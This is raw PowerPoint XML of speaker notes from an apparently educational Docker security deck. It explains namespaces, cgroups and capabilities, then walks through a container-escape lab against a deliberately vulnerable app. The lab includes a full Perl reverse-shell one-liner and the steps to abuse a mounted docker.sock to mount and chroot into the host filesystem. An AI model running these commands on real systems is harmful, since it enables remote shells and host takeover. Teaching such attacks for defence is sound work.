            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>Docker uses a technology called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>namespaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> to provide the isolated workspace called the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>container</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>. When you run a container, Docker creates a set of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>namespaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> for that container.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>These namespaces provide a layer of isolation. Each aspect of a container runs in a separate namespace and its access is limited to that namespace.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>These are running in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> but appear to run in isolation because these are namespaces. What you have inside a container is a list of namespaces or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> for your own process itself and that gets mapped to certain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>pids</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> on the host system. Inside containers the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>pids</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> are 1,2,3,4 they are actually mapped to the process on the host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>There are other namespaces which make it look like running a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and that’s what isolates one container from another.</a:t>
            </a:r>
          </a:p>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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1607994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When a container is launched, it is mounted as read-only and it also creates a read/write layer for any changes that are made inside the container</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201D8A07-97E7-4C1A-9693-9D89842C91CA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1791117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a container is launched,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> it is mounted as read-only and it also creates a read/write layer for any changes that are made inside the container</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Sed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –n ‘s/.*\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>perdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=\</a:t>
            </a:r>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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4143925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Control groups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Now when these processes are run in isolation, and run multiple containers on the same host, there is a possibility that there is a container that has a memory leak for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>: it would affect the rest of the system / containers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This is where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>cgroups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> come into play. What control groups allow you to do is control as the name says. Control the resource utilization and keep a limit on the memory CPUs etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Cgroups are also used for monitoring the containers</a:t>
            </a:r>
          </a:p>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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="781935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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="474372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Breaking down of root privileges into granular capabilities allows you to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remove individual capabilities from the root user account, making it less powerful/dangerous.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Add privileges to non-root users at a very granular level.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>By default, Docker drops all capabilities except </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>those needed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, using a whitelist approach.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> take an example if you want to perform logging of containers. This would require your</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>In each node of your cluster, you should have an agent running to make sure logs are coming into the system. To gather information from the container namespace, they need to have this visibility. These logging tools require </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>additionacl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> privileges than your normal containers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So this attack will on abusing such capabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>One such capability is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sys_ptrace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> which allows to trace the host process. Going ahead we assume that we have a shell access on the container. And we will try break out of it.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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4139821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a container is launched,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> it is mounted as read-only and it also creates a read/write layer for any changes that are made inside the container</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2586492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a container is launched,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> it is mounted as read-only and it also creates a read/write layer for any changes that are made inside the container</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3698630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using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> you can simply create a compact runtime environment for your application to run without worrying about the dependencies on your host.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="819362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a container is launched,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> it is mounted as read-only and it also creates a read/write layer for any changes that are made inside the container</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1709658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assume that we already have a shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> inside the container with a web application vulnerability or an insider who administers one of the containers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" baseline="0" dirty="0" smtClean="0"/>
              <a:t>sudo docker volume create dvna_data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> run --name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dvna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -v /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/run/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>docker.sock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/run/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>docker.sock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dvna_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:/data -p 9090:9090 -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>appsecco</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dvna:sqlite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> if there is error, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the existing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>dvna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> container</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> -a | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>dvna</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> &lt;container-id&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Got to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> http://10.1.1.116:9090/app/ping</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -e 'use Socket;$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="192.168.0.37";$p=1234;socket(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>S,PF_INET,SOCK_STREAM,getprotobyname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"));if(connect(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>S,sockaddr_in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>p,inet_aton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>");};'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> https://download.docker.com/linux/static/stable/x86_64/docker-17.03.0-ce.tgz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tar -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>zxvf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> docker-17.03.0-ce.tgz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0" smtClean="0"/>
              <a:t>./docker -H  unix:///var/run/docker.sock ps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>./docker run -i -v /:/host2 debian:jessie /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>chroot /host2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>cat /etc/hostname</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2640619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assume that we already have a shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> inside the container with a web application vulnerability or an insider who administers one of the containers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" baseline="0" dirty="0" smtClean="0"/>
              <a:t>sudo docker volume create dvna_data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> run --name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dvna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -v /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/run/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>docker.sock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/run/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>docker.sock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dvna_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:/data -p 9090:9090 -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>appsecco</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dvna:sqlite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> if there is error, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the existing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>dvna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> container</a:t>
            </a:r>
          </a:p>
          <a:p>
